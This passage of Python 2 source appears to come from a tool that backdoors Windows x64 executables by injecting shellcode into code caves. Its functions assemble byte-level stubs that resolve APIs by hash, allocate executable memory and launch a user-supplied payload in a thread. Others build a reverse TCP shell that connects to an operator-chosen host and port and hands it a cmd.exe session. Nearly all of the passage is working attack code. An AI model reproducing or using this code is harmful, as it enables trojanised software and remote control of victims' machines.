                            #set_handler:
                            "\x48\x31\xC0"  # xor rax,rax
                            "\x50"  # push rax ; LPDWORD lpThreadId (NULL)
                            "\x50"  # push rax ; DWORD dwCreationFlags (0)
                            "\x49\x89\xC1"  # mov r9, rax ; LPVOID lpParameter (NULL)
                            "\x48\x89\xC2"  # mov rdx, rax ; LPTHREAD_START_ROUTINE lpStartAddress (payload)
                            "\x49\x89\xD8"  # mov r8, rbx ; SIZE_T dwStackSize (0 for default)
                            "\x48\x89\xC1"  # mov rcx, rax ; LPSECURITY_ATTRIBUTES lpThreadAttributes (NULL)
                            "\x49\xC7\xC2\x38\x68\x0D\x16"  # mov r10, 0x160D6838 ; hash( "kernel32.dll", "CreateThread" )
                            "\xFF\xD5"  # call rbp ; Spawn payload thread
                            "\x48\x83\xC4\x58"  # add rsp, 50
                            #stackrestore
                            "\x9d\x41\x5f\x41\x5e\x41\x5d\x41\x5c\x41\x5b\x41\x5a\x41\x59"
                            "\x41\x58\x5d\x5f\x5e\x5a\x59\x5b\x58"
                            )
        breakupvar = eat_code_caves(flItms, 0, 2)
        #Jump to the win64 return to normal execution code segment.
        if flItms['cave_jumping'] is True:
            self.shellcode1 += "\xe9"
            if breakupvar > 0:
                if len(self.shellcode1) < breakupvar:
                    self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
                                                   len(self.shellcode1) - 4).rstrip('L')), 16))
                else:
                    self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
                                                   breakupvar - len(self.stackpreserve) - 4).rstrip('L')), 16))
            else:
                self.shellcode1 += struct.pack("<I", int(str(hex(0xffffffff + breakupvar - len(self.stackpreserve) -
                                               len(self.shellcode1) - 3).rstrip('L')), 16))
        else:
            self.shellcode1 += "\xE9"
            self.shellcode1 += struct.pack("<I", len(self.shellcode2))
            #self.shellcode1 += "\xE9\x47\x02\x00\x00"
        self.shellcode = self.stackpreserve + self.shellcode1 + self.shellcode2
        return (self.stackpreserve + self.shellcode1, self.shellcode2)
    def user_supplied_shellcode_threaded(self, flItms, CavesPicked={}):
        """
        User supplies the shellcode, make sure that it EXITs via a thread.

        Builds a two-segment win x64 stub:
          * shellcode1 - hash-based API resolution (api_call), VirtualAlloc of
            RWX memory, copy of the payload, and a CreateThread launch so the
            host process keeps running.
          * shellcode2 - a call that leaves the payload's address on the stack,
            an optional cave clean-up stub / NOP-sled, then the raw user bytes.
        Returns (stackpreserve + shellcode1, shellcode2) on success, or False
        when no shellcode was supplied via -U.

        NOTE(review): CavesPicked is a mutable default argument; it is only
        compared against {} here (never mutated), so it is harmless.
        """
        flItms['stager'] = True
        if flItms['supplied_shellcode'] is None:
            print "[!] User must provide shellcode for this module (-U)"
            return False
        else:
            # NOTE(review): the file handle is never closed, and the bytes are
            # injected verbatim with no validation of the supplied payload.
            self.supplied_shellcode = open(self.SUPPLIED_SHELLCODE, 'r+b').read()
        #overloading the class stackpreserve
        self.stackpreserve = ("\x90\x50\x53\x51\x52\x56\x57\x55\x41\x50"
                              "\x41\x51\x41\x52\x41\x53\x41\x54\x41\x55\x41\x56\x41\x57\x9c"
                              )
        breakupvar = eat_code_caves(flItms, 0, 1)
        #get_payload:  #Jump back with the address for the payload on the stack.
        # Jump distances are emitted as little-endian DWORDs; hex()/rstrip('L')
        # strips the Python 2 long suffix before re-parsing as an int.
        if flItms['cave_jumping'] is True:
            self.shellcode2 = "\xe8"
            if breakupvar > 0:
                if len(self.shellcode2) < breakupvar:
                    self.shellcode2 += struct.pack("<I", int(str(hex(0xffffffff - breakupvar -
                                                   len(self.shellcode2) + 272).rstrip('L')), 16))
                else:
                    self.shellcode2 += struct.pack("<I", int(str(hex(0xffffffff - len(self.shellcode2) -
                                                   breakupvar + 272).rstrip('L')), 16))
            else:
                self.shellcode2 += struct.pack("<I", int(str(hex(abs(breakupvar) + len(self.stackpreserve) +
                                               len(self.shellcode2) + 244).rstrip('L')), 16))
        else:
            self.shellcode2 = "\xE8\xB8\xFF\xFF\xFF"
        #Can inject any shellcode below.
        if flItms['NewCodeCave'] is False:
            if CavesPicked != {}:
                self.shellcode2 += self.clean_caves_stub(flItms['CavesToFix'])
            else:
                self.shellcode2 += "\x41" * 90
        self.shellcode2 += self.supplied_shellcode
        breakupvar = eat_code_caves(flItms, 0, 1)
        self.shellcode1 = ("\x90"                              # <--THAT'S A NOP. \o/
                           "\xe8\xc0\x00\x00\x00"              # call allocate (skips over the api_call block below)
                           #api_call
                           "\x41\x51"                          # push r9
                           "\x41\x50"                          # push r8
                           "\x52"                              # push rdx
                           "\x51"                              # push rcx
                           "\x56"                              # push rsi
                           "\x48\x31\xD2"                      # xor rdx,rdx
                           "\x65\x48\x8B\x52\x60"              # mov rdx,qword ptr gs:[rdx+96]
                           "\x48\x8B\x52\x18"                  # mov rdx,qword ptr [rdx+24]
                           "\x48\x8B\x52\x20"                  # mov rdx,qword ptr[rdx+32]
                           #next_mod
                           "\x48\x8b\x72\x50"                  # mov rsi,[rdx+80]
                           "\x48\x0f\xb7\x4a\x4a"              # movzx rcx,word [rdx+74]
                           "\x4d\x31\xc9"                      # xor r9,r9
                           #loop_modname
                           "\x48\x31\xc0"                      # xor rax,rax
                           "\xac"                              # lods
                           "\x3c\x61"                          # cmp al, 61h (a)
                           "\x7c\x02"                          # jl 02
                           "\x2c\x20"                          # sub al, 0x20
                           #not_lowercase
                           "\x41\xc1\xc9\x0d"                  # ror r9d, 13
                           "\x41\x01\xc1"                      # add r9d, eax
                           "\xe2\xed"                          # loop until read, back to xor rax, rax
                           "\x52"                              # push rdx ; Save the current position in the module list for later
                           "\x41\x51"                          # push r9 ; Save the current module hash for later
                           # ; Proceed to itterate the export address table,
                           "\x48\x8b\x52\x20"                  # mov rdx, [rdx+32] ; Get this modules base address
                           "\x8b\x42\x3c"                      # mov eax, dword [rdx+60] ; Get PE header
                           "\x48\x01\xd0"                      # add rax, rdx ; Add the modules base address
                           "\x8b\x80\x88\x00\x00\x00"          # mov eax, dword [rax+136] ; Get export tables RVA
                           "\x48\x85\xc0"                      # test rax, rax ; Test if no export address table is present
                           "\x74\x67"                          # je get_next_mod1 ; If no EAT present, process the next module
                           "\x48\x01\xd0"                      # add rax, rdx ; Add the modules base address
                           "\x50"                              # push rax ; Save the current modules EAT
                           "\x8b\x48\x18"                      # mov ecx, dword [rax+24] ; Get the number of function names
                           "\x44\x8b\x40\x20"                  # mov r8d, dword [rax+32] ; Get the rva of the function names
                           "\x49\x01\xd0"                      # add r8, rdx ; Add the modules base address
                           #; Computing the module hash + function hash
                           #get_next_func: ;
                           "\xe3\x56"                          # jrcxz get_next_mod ; When we reach the start of the EAT (we search backwards), process the next module
                           "\x48\xff\xc9"                      # dec rcx ; Decrement the function name counter
                           "\x41\x8b\x34\x88"                  # mov esi, dword [r8+rcx*4]; Get rva of next module name
                           "\x48\x01\xd6"                      # add rsi, rdx ; Add the modules base address
                           "\x4d\x31\xc9"                      # xor r9, r9 ; Clear r9 which will store the hash of the function name
                           # ; And compare it to the one we wan
                           #loop_funcname: ;
                           "\x48\x31\xc0"                      # xor rax, rax ; Clear rax
                           "\xac"                              # lodsb ; Read in the next byte of the ASCII function name
                           "\x41\xc1\xc9\x0d"                  # ror r9d, 13 ; Rotate right our hash value
                           "\x41\x01\xc1"                      # add r9d, eax ; Add the next byte of the name
                           "\x38\xe0"                          # cmp al, ah ; Compare AL (the next byte from the name) to AH (null)
                           "\x75\xf1"                          # jne loop_funcname ; If we have not reached the null terminator, continue
                           "\x4c\x03\x4c\x24\x08"              # add r9, [rsp+8] ; Add the current module hash to the function hash
                           "\x45\x39\xd1"                      # cmp r9d, r10d ; Compare the hash to the one we are searchnig for
                           "\x75\xd8"                          # jnz get_next_func ; Go compute the next function hash if we have not found it
                           # ; If found, fix up stack, call the function and then value else compute the next one...
                           "\x58"                              # pop rax ; Restore the current modules EAT
                           "\x44\x8b\x40\x24"                  # mov r8d, dword [rax+36] ; Get the ordinal table rva
                           "\x49\x01\xd0"                      # add r8, rdx ; Add the modules base address
                           "\x66\x41\x8b\x0c\x48"              # mov cx, [r8+2*rcx] ; Get the desired functions ordinal
                           "\x44\x8b\x40\x1c"                  # mov r8d, dword [rax+28] ; Get the function addresses table rva
                           "\x49\x01\xd0"                      # add r8, rdx ; Add the modules base address
                           "\x41\x8b\x04\x88"                  # mov eax, dword [r8+4*rcx]; Get the desired functions RVA
                           "\x48\x01\xd0"                      # add rax, rdx ; Add the modules base address to get the functions actual VA
                           #; We now fix up the stack and perform the call to the drsired function...
                           #finish:
                           "\x41\x58"                          # pop r8 ; Clear off the current modules hash
                           "\x41\x58"                          # pop r8 ; Clear off the current position in the module list
                           "\x5E"                              # pop rsi ; Restore RSI
                           "\x59"                              # pop rcx ; Restore the 1st parameter
                           "\x5A"                              # pop rdx ; Restore the 2nd parameter
                           "\x41\x58"                          # pop r8 ; Restore the 3rd parameter
                           "\x41\x59"                          # pop r9 ; Restore the 4th parameter
                           "\x41\x5A"                          # pop r10 ; pop off the return address
                           "\x48\x83\xEC\x20"                  # sub rsp, 32 ; reserve space for the four register params (4 * sizeof(QWORD) = 32)
                           # ; It is the callers responsibility to restore RSP if need be (or alloc more space or align RSP).
                           "\x41\x52"                          # push r10 ; push back the return address
                           "\xFF\xE0"                          # jmp rax ; Jump into the required function
                           # ; We now automagically return to the correct caller...
                           #get_next_mod: ;
                           "\x58"                              # pop rax ; Pop off the current (now the previous) modules EAT
                           #get_next_mod1: ;
                           "\x41\x59"                          # pop r9 ; Pop off the current (now the previous) modules hash
                           "\x5A"                              # pop rdx ; Restore our position in the module list
                           "\x48\x8B\x12"                      # mov rdx, [rdx] ; Get the next module
                           "\xe9\x57\xff\xff\xff"              # jmp next_mod ; Process this module
                           )
        #allocate
        self.shellcode1 += ("\x5d"                             # pop rbp
                            "\x49\xc7\xc6"                     # mov r14, imm32 below: size of payload
                            )
        # Payload size (shellcode2 minus its 5-byte call prefix) as imm32.
        self.shellcode1 += struct.pack("<I", len(self.shellcode2) - 5)
        self.shellcode1 += ("\x6a\x40"                         # push 40h
                            "\x41\x59"                         # pop r9 now 40h
                            "\x68\x00\x10\x00\x00"             # push 1000h
                            "\x41\x58"                         # pop r8.. now 1000h
                            "\x4C\x89\xF2"                     # mov rdx, r14
                            "\x6A\x00"                         # push 0
                            "\x59"                             # pop rcx
                            "\x68\x58\xa4\x53\xe5"             # push E553a458  ; hash("kernel32.dll", "VirtualAlloc")
                            "\x41\x5A"                         # pop r10
                            "\xff\xd5"                         # call rbp
                            "\x48\x89\xc3"                     # mov rbx, rax ; Store allocated address in ebx
                            "\x48\x89\xc7"                     # mov rdi, rax ; Prepare EDI with the new address
                            )
        ##mov rcx, payload length (rep movsb count)
        self.shellcode1 += "\x48\xc7\xc1"
        self.shellcode1 += struct.pack("<I", len(self.shellcode2) - 5)
        #call the get_payload right before the payload
        if flItms['cave_jumping'] is True:
            self.shellcode1 += "\xe9"
            if breakupvar > 0:
                if len(self.shellcode1) < breakupvar:
                    self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
                                                   len(self.shellcode1) - 4).rstrip('L')), 16))
                else:
                    self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
                                                   breakupvar - len(self.stackpreserve) - 4).rstrip('L')), 16))
            else:
                self.shellcode1 += struct.pack("<I", int('0xffffffff', 16) + breakupvar - len(self.stackpreserve) -
                                               len(self.shellcode1) - 3)
        else:
            self.shellcode1 += "\xeb\x43"
        # got_payload:
        self.shellcode1 += ("\x5e"                             # pop rsi ; Prepare ESI with the source to copy
                            "\xf2\xa4"                         # rep movsb ; Copy the payload to RWX memory
                            "\xe8\x00\x00\x00\x00"             # call set_handler ; Configure error handling
                            #set_handler:
                            "\x48\x31\xC0"                     # xor rax,rax
                            "\x50"                             # push rax ; LPDWORD lpThreadId (NULL)
                            "\x50"                             # push rax ; DWORD dwCreationFlags (0)
                            "\x49\x89\xC1"                     # mov r9, rax ; LPVOID lpParameter (NULL)
                            "\x48\x89\xC2"                     # mov rdx, rax ; LPTHREAD_START_ROUTINE lpStartAddress (payload)
                            "\x49\x89\xD8"                     # mov r8, rbx ; SIZE_T dwStackSize (0 for default)
                            "\x48\x89\xC1"                     # mov rcx, rax ; LPSECURITY_ATTRIBUTES lpThreadAttributes (NULL)
                            "\x49\xC7\xC2\x38\x68\x0D\x16"     # mov r10, 0x160D6838 ; hash( "kernel32.dll", "CreateThread" )
                            "\xFF\xD5"                         # call rbp ; Spawn payload thread
                            "\x48\x83\xC4\x58"                 # add rsp, 0x58 (88 bytes)
                            #stackrestore
                            "\x9d\x41\x5f\x41\x5e\x41\x5d\x41\x5c\x41\x5b\x41\x5a\x41\x59"
                            "\x41\x58\x5d\x5f\x5e\x5a\x59\x5b\x58"
                            )
        breakupvar = eat_code_caves(flItms, 0, 2)
        #Jump to the win64 return to normal execution code segment.
        if flItms['cave_jumping'] is True:
            self.shellcode1 += "\xe9"
            if breakupvar > 0:
                if len(self.shellcode1) < breakupvar:
                    self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
                                                   len(self.shellcode1) - 4).rstrip('L')), 16))
                else:
                    self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
                                                   breakupvar - len(self.stackpreserve) - 4).rstrip('L')), 16))
            else:
                self.shellcode1 += struct.pack("<I", int(str(hex(0xffffffff + breakupvar - len(self.stackpreserve) -
                                               len(self.shellcode1) - 3).rstrip('L')), 16))
        else:
            self.shellcode1 += "\xe9"
            self.shellcode1 += struct.pack("<I", len(self.shellcode2))
        self.shellcode = self.stackpreserve + self.shellcode1 + self.shellcode2
        return (self.stackpreserve + self.shellcode1, self.shellcode2)
def iat_reverse_tcp_inline(self, flItms, CavesPicked={}):
"""
Position dependent shellcode that uses API thunks of LoadLibraryA and
GetProcAddress to find and load APIs for callback to C2.
"""
flItms['apis_needed'] = ['LoadLibraryA', 'GetProcAddress']
for api in flItms['apis_needed']:
if api not in flItms:
return False
if self.PORT is None:
print ("This payload requires the PORT parameter -P")
return False
if self.HOST is None:
print "This payload requires a HOST parameter -H"
return False
self.shellcode1 = "\xfc" # CLD
self.shellcode1 += "\x49\xBE" # mov value below to r14
#Think about putting the LOADLIBA and GETPROCADDRESS in rX regs
if flItms['LoadLibraryA'] - (flItms['AddressOfEntryPoint'] + flItms['ImageBase']) < 0:
self.shellcode1 += struct.pack("<Q", 0xffffffff + (flItms['LoadLibraryA'] - (flItms['AddressOfEntryPoint'] + flItms['ImageBase']) + 1))
else:
self.shellcode1 += struct.pack("<Q", flItms['LoadLibraryA'] - (flItms['AddressOfEntryPoint'] + flItms['ImageBase']))
#RDX holds entry point
self.shellcode1 += "\x49\x01\xD6" # add r14 + RDX
self.shellcode1 += "\x49\xBF" # mov value below to r15
if flItms['GetProcAddress'] - (flItms['AddressOfEntryPoint'] + flItms['ImageBase']) < 0:
self.shellcode1 += struct.pack("<Q", 0xffffffff + (flItms['GetProcAddress'] - (flItms['AddressOfEntryPoint'] + flItms['ImageBase']) + 1))
else:
self.shellcode1 += struct.pack("<Q", flItms['GetProcAddress'] - (flItms['AddressOfEntryPoint'] + flItms['ImageBase']))
self.shellcode1 += "\x49\x01\xD7" # add r15 + RDX
#LoadLibraryA in r14
#GetProcAddress in r15
'''
Winx64 asm calling convention
RCX, RDX, R8, R9 for the first four integer or pointer arguments (in that order),
and XMM0, XMM1, XMM2, XMM3 are used for floating point arguments. Additional arguments
are pushed onto the stack (right to left). Integer return values (similar to x86) are
returned in RAX if 64 bits or less. Floating point return values are returned in XMM0.
Parameters less than 64 bits long are not zero extended; the high bits are not zeroed.
The caller reserves space on the stack (unlike x86)
rbx
rbp
r12
r13
r14: GetProcAddress
r15: LoadLibraryA
'''
self.shellcode1 += ("\x49\xbb\x77\x73\x32\x5F\x33\x32\x00\x00" # mov r11, ws2_32
"\x41\x53" # push r11
"\x49\x89\xE3" # mov r11, rsp
"\x48\x81\xEC\xA0\x01\x00\x00" # sub rsp, 408+8 # size of WSAData
"\x48\x89\xE6" # mov rsi, rsp pointer to WSAData struct
"\x48\xBF\x02\x00"
)
self.shellcode1 += struct.pack('!H', self.PORT)
self.shellcode1 += self.pack_ip_addresses()
self.shellcode1 += ("\x57" # push rdi
"\x48\x89\xE7" # mov rdi, rsp pointer to data
"\x4C\x89\xD9" # mov rcx, r11 #ws2_32
"\x48\x83\xEC\x20" # sub rsp, 0x20
"\x41\xff\x16" # call qword ptr [r14] ; LoadLibA
"\x49\x89\xC5" # mov r13, rax ; handle ws2_32 to r13
# handle ws2_32 to r13
"\x48\x89\xC1" # mov rcx, rax
"\xeb\x0c" # short jmp over api
"\x57\x53\x41\x53\x74\x61" # WSAStartup
"\x72\x74\x75\x70\x00\x00" # ...
"\x48\x8D\x15\xED\xFF\xFF\xFF" # lea rdx, [rip-19]
"\x48\x83\xEC\x20" # sub rsp, 0x20
"\x41\xFF\x17" # Call qword ptr [r15] ; GetProcAddr
"\x48\x95" # xchg rbp, rax ; mov wsastartup to rbp
# wsastartup to rbp
"\xeb\x0c" # jmp over WSASocketA
"\x57\x53\x41\x53\x6f\x63" # WSASocketA
"\x6b\x65\x74\x41\x00\x00" #
"\x48\x8D\x15\xED\xFF\xFF\xFF" # lea rdx, [rip-19]
"\x4C\x89\xE9" # mov rcx, r13
"\x48\x83\xEC\x20" # sub rsp, 0x20
"\x41\xFF\x17" # call qword ptr [r15] GetProcAddr WSASocketA
"\x49\x94" # xchg r12, rax ; mov WSASocketA to r12
# WSASocketA to r12
"\x48\x89\xF2" # mov rdx, rsi ; mov point to struct
"\x68\x01\x01\x00\x00" # push 0x0101
"\x59" # pop rcx
"\x48\x83\xEC\x20" # sub rsp, 0x20
"\xff\xd5" # call rbp ; WSAStartup(0x0101, &WSAData);
"\x50" # push rax
"\x50" # push rax
"\x4D\x31\xC0" # xor r8, r8
"\x4D\x31\xC9" # xor r9, r9
"\x48\xff\xC0" # inc rax
"\x48\x89\xC2" # mov rdx, rax
"\x48\xff\xC0" # inc rax
"\x48\x89\xC1" # mov rdx, rax
"\x48\x83\xEC\x20" # sub rsp, 0x20
"\x41\xFF\xD4" # call r12 ;WSASocketA(AF_INT, SOCK_STREAM, 0 0 0 0)
"\x49\x94" # xchg r12, rax ; mov socket to r12
# get connect
"\x48\xBA\x63\x6F\x6E\x6E\x65\x63\x74\x00" # mov rdx, "connect\x00"
"\x52" # push rdx
"\x48\x89\xE2" # mov rdx, rsp
"\x4C\x89\xE9" # mov rcx, r13; ws2_32 handle
"\x48\x83\xEC\x20" # sub rsp, 0x20
"\x41\xFF\x17" # call qword ptr [r15] ;GetProcAddr connect
"\x48\x89\xC3" # mov rbx, rax ;connect api
"\x6A\x10" # push 16
"\x41\x58" # pop r8
"\x48\x89\xFA" # mov rdx, rdi
"\x4C\x89\xE1" # mov rcx, r12
"\x48\x83\xEC\x20" # sub rsp, 0x20
"\xFF\xD3" # call rbx ;connect (s, &sockaddr, 16)
)
#socket is in r12
#breakupvar is the distance between codecaves
breakupvar = eat_code_caves(flItms, 0, 1)
if flItms['cave_jumping'] is True:
self.shellcode1 += "\xe9" # JMP opcode
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int('0xffffffff', 16) + breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 3)
self.shellcode2 = ("\xeb\x09" # jump over kernel32
"\x6b\x65\x72\x6e\x65\x6c\x33\x32\x00" # kernel32,00
"\x48\x8D\x0D\xF0\xFF\xFF\xFF" # lea rcx, [rip-4]
"\x48\x83\xEC\x20" # sub rsp, 20
"\x41\xFF\x16" # call qword ptr [r14]
# getprocaddress CreateProcessA
"\x49\x89\xC5" # mov r13, rax ; mov kernel32 to r13
"\x48\x89\xC1" # mov rcx, rax
"\xeb\x0f" # jump over CreateProcessA,0
"\x43\x72\x65\x61\x74\x65\x50" # CreateProcessA
"\x72\x6f\x63\x65\x73\x73\x41\x00" # ...
"\x48\x8D\x15\xEA\xFF\xFF\xFF" # lea rdx, [rip - 22]
"\x48\x83\xEC\x20" # sub rsp, 20
"\x41\xFF\x17" # call qword ptr [r15] GetProcAddr CreateProcessA
# CreateProcessesA in rax
"\x48\x89\xC7" # mov rdi, rax ;mov CreateProcessA to rdi
"\x49\x87\xFC" # xchg r12, rdi (socket handle for CreateProcessA)
# socket is in rdi
# shell:
"\x49\xb8\x63\x6d\x64\x00\x00\x00\x00\x00" # mov r8, 'cmd'
"\x41\x50" # push r8 ; an extra push for alignment
"\x41\x50" # push r8 ; push our command line: 'cmd',0
"\x48\x89\xe2" # mov rdx, rsp ; save a pointer to the command line
"\x57" # push rdi ; our socket becomes the shells hStdError
"\x57" # push rdi ; our socket becomes the shells hStdOutput
"\x57" # push rdi ; our socket becomes the shells hStdInput
"\x4d\x31\xc0" # xor r8, r8 ; Clear r8 for all the NULL's we need to push
"\x6a\x0d" # push byte 13 ; We want to place 104 (13 * 8) null bytes onto the stack
"\x59" # pop rcx ; Set RCX for the loop
# 1 push_loop: ;
"\x41\x50" # push r8 ; push a null qword
"\xe2\xfc" # loop push_loop ; keep looping untill we have pushed enough nulls
"\x66\xc7\x44\x24\x54\x01\x01" # mov word [rsp+84], 0x0101 ; Set the STARTUPINFO Structure's dwFlags to STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW
"\x48\x8d\x44\x24\x18" # lea rax, [rsp+24] ; Set RAX as a pointer to our STARTUPINFO Structure
"\xc6\x00\x68" # mov byte [rax], 104 ; Set the size of the STARTUPINFO Structure
"\x48\x89\xe6" # mov rsi, rsp ; Save the pointer to the PROCESS_INFORMATION Structure
# ; 1 perform the call to CreateProcessA
"\x56" # push rsi ; Push the pointer to the PROCESS_INFORMATION Structure
"\x50" # push rax ; Push the pointer to the STARTUPINFO Structure
"\x41\x50" # push r8 ; The lpCurrentDirectory is NULL so the new process will have the same current directory as its parent
"\x41\x50" # push r8 ; The lpEnvironment is NULL so the new process will have the same enviroment as its parent
"\x41\x50" # push r8 ; We dont specify any dwCreationFlags
"\x49\xff\xc0" # inc r8 ; Increment r8 to be one
"\x41\x50" # push r8 ; Set bInheritHandles to TRUE in order to inheritable all possible handle from the parent
"\x49\xff\xc8" # dec r8 ; Decrement r8 (third param) back down to zero
"\x4d\x89\xc1" # mov r9, r8 ; Set fourth param, lpThreadAttributes to NULL
# ; r8 = lpProcessAttributes (NULL)
# ; rdx = the lpCommandLine to point to "cmd",0
"\x4c\x89\xc1" # mov rcx, r8 ; Set lpApplicationName to NULL as we are using the command line param instead
"\x48\x83\xEC\x20" # sub rsp, 20
"\x41\xFF\xD4" # call r12 ; CreateProcessA( 0, &"cmd", 0, 0, TRUE, 0, 0, 0, &si, &pi );
# perform the call to WaitForSingleObject
"\xeb\x14" # jmp over WaitForSingleObject
"\x57\x61\x69\x74\x46\x6f\x72\x53" # WaitForSingleObject
"\x69\x6e\x67\x6c\x65\x4f\x62\x6a" # ...
"\x65\x63\x74\x00" # ...
"\x48\x8D\x15\xE5\xFF\xFF\xFF" # lea rdx, [rip-27]
"\x4C\x89\xE9" # mov rcx, r13 ; mov kernel32 handle to rcx
"\x48\x83\xEC\x20" # sub rsp, 0x20
"\x41\xFF\x17" # call qword ptr [r15] GetProcAddr WaitForSingleObject
# WaitForSingleObject is in rax
"\x48\x31\xd2" # xor rdx, rdx
"\x8b\x0e" # mov ecx, dword [rsi] ; set the first param to the handle from our PROCESS_INFORMATION.hProcess
"\x48\x83\xEC\x20" # sub rsp, 0x20
"\xFF\xD0" # call rax; WaitForSingleObject( pi.hProcess, INFINITE );
#Fix Up rsp
"\x48\x81\xC4\x08\x04\x00\x00" # add rsp, 490
)
self.shellcode = self.stackpreserve + self.shellcode1 + self.shellcode2 + self.stackrestore
return (self.stackpreserve + self.shellcode1, self.shellcode2 + self.stackrestore)
def iat_reverse_tcp_inline_threaded(self, flItms, CavesPicked={}):
"""
Complete IAT based payload includes spawning of thread.
"""
flItms['stager'] = True
flItms['apis_needed'] = ['LoadLibraryA', 'GetProcAddress',
'CreateThread', 'VirtualAlloc']
for api in flItms['apis_needed']:
if api not in flItms:
return False
if self.PORT is None:
print ("This payload requires the PORT parameter -P")
return False
if self.HOST is None:
print "This payload requires a HOST parameter -H"
return False
#overloading the class stackpreserve
self.stackpreserve = ("\x90\x50\x53\x51\x52\x56\x57\x55\x41\x50"
"\x41\x51\x41\x52\x41\x53\x41\x54\x41\x55\x41\x56\x41\x57\x9c"
)
breakupvar = eat_code_caves(flItms, 0, 1)
#get_payload: #Jump back with the address for the payload on the stack.
if flItms['cave_jumping'] is True:
self.shellcode2 = "\xe8"
if breakupvar > 0:
if len(self.shellcode2) < breakupvar:
self.shellcode2 += struct.pack("<I", int(str(hex(0xffffffff - breakupvar -
len(self.shellcode2) + 272).rstrip('L')), 16))
else:
self.shellcode2 += struct.pack("<I", int(str(hex(0xffffffff - len(self.shellcode2) -
breakupvar + 272).rstrip('L')), 16))
else:
self.shellcode2 += struct.pack("<I", int(str(hex(abs(breakupvar) + len(self.stackpreserve) +
len(self.shellcode2) + 244).rstrip('L')), 16))
else:
self.shellcode2 = "\xE8\xB8\xFF\xFF\xFF"
#Can inject any shellcode below.
if flItms['NewCodeCave'] is False:
if CavesPicked != {}:
self.shellcode2 += self.clean_caves_stub(flItms['CavesToFix'])
else:
self.shellcode2 += "\x41" * 90
self.shellcode2 += "\xfc" # CLD
self.shellcode2 += "\x55\x48\x89\xE5" # push rbp, mov rpp, rsp
self.shellcode2 += "\x48\x31\xD2" # xor rdx, rdx
self.shellcode2 += "\x65\x48\x8B\x52\x60" # mov rdx, QWORD ptr gs: [rdx+0x60]
self.shellcode2 += "\x48\x8B\x52\x10" # mov rdx, Qword ptr [rdx + 10]
# rdx now module entry
self.shellcode2 += "\x49\xBE" # mov value below to r14
if flItms['LoadLibraryA'] - flItms['ImageBase'] < 0:
self.shellcode2 += struct.pack("<Q", 0xffffffff + (flItms['LoadLibraryA'] - flItms['ImageBase'] + 1))
else:
self.shellcode2 += struct.pack("<Q", flItms['LoadLibraryA'] - flItms['ImageBase'])
#RDX holds entry point
self.shellcode2 += "\x49\x01\xD6" # add r14 + RDX
self.shellcode2 += "\x49\xBF" # mov value below to r15
if flItms['GetProcAddress'] - flItms['ImageBase'] < 0:
self.shellcode2 += struct.pack("<Q", 0xffffffff + (flItms['GetProcAddress'] - flItms['ImageBase'] + 1))
else:
self.shellcode2 += struct.pack("<Q", flItms['GetProcAddress'] - flItms['ImageBase'])
self.shellcode2 += "\x49\x01\xD7" # add r15 + RDX
#LoadLibraryA in r14
#GetProcAddress in r15
'''
Winx64 asm calling convention
RCX, RDX, R8, R9 for the first four integer or pointer arguments (in that order),
and XMM0, XMM1, XMM2, XMM3 are used for floating point arguments. Additional arguments
are pushed onto the stack (right to left). Integer return values (similar to x86) are
returned in RAX if 64 bits or less. Floating point return values are returned in XMM0.
Parameters less than 64 bits long are not zero extended; the high bits are not zeroed.
The caller reserves space on the stack (unlike x86)
rbx
rbp
r12
r13
r14: GetProcAddress
r15: LoadLibraryA
'''
self.shellcode2 += ("\x49\xbb\x77\x73\x32\x5F\x33\x32\x00\x00" # mov r11, ws2_32
"\x41\x53" # push r11
"\x49\x89\xE3" # mov r11, rsp
"\x48\x81\xEC\xA0\x01\x00\x00" # sub rsp, 408+8 # size of WSAData
"\x48\x89\xE6" # mov rsi, rsp pointer to WSAData struct
"\x48\xBF\x02\x00"
)
self.shellcode2 += struct.pack('!H', self.PORT)
self.shellcode2 += self.pack_ip_addresses()
self.shellcode2 += ("\x57" # push rdi
"\x48\x89\xE7" # mov rdi, rsp pointer to data
"\x4C\x89\xD9" # mov rcx, r11 #ws2_32
"\x48\x83\xEC\x20" # sub rsp, 0x20
"\x41\xff\x16" # call qword ptr [r14] ; LoadLibA
"\x49\x89\xC5" # mov r13, rax ; handle ws2_32 to r13
# handle ws2_32 to r13
"\x48\x89\xC1" # mov rcx, rax
"\xeb\x0c" # short jmp over api
"\x57\x53\x41\x53\x74\x61" # WSAStartup
"\x72\x74\x75\x70\x00\x00" # ...
"\x48\x8D\x15\xED\xFF\xFF\xFF" # lea rdx, [rip-19]
"\x48\x83\xEC\x20" # sub rsp, 0x20
"\x41\xFF\x17" # Call qword ptr [r15] ; GetProcAddr
"\x48\x95" # xchg rbp, rax ; mov wsastartup to rbp
# wsastartup to rbp
"\xeb\x0c" # jmp over WSASocketA
"\x57\x53\x41\x53\x6f\x63" # WSASocketA
"\x6b\x65\x74\x41\x00\x00" #
"\x48\x8D\x15\xED\xFF\xFF\xFF" # lea rdx, [rip-19]
"\x4C\x89\xE9" # mov rcx, r13
"\x48\x83\xEC\x20" # sub rsp, 0x20
"\x41\xFF\x17" # call qword ptr [r15] GetProcAddr WSASocketA
"\x49\x94" # xchg r12, rax ; mov WSASocketA to r12
# WSASocketA to r12
"\x48\x89\xF2" # mov rdx, rsi ; mov point to struct
"\x68\x01\x01\x00\x00" # push 0x0101
"\x59" # pop rcx
"\x48\x83\xEC\x20" # sub rsp, 0x20
"\xff\xd5" # call rbp ; WSAStartup(0x0101, &WSAData);
"\x50" # push rax
"\x50" # push rax
"\x4D\x31\xC0" # xor r8, r8
"\x4D\x31\xC9" # xor r9, r9
"\x48\xff\xC0" # inc rax
"\x48\x89\xC2" # mov rdx, rax
"\x48\xff\xC0" # inc rax
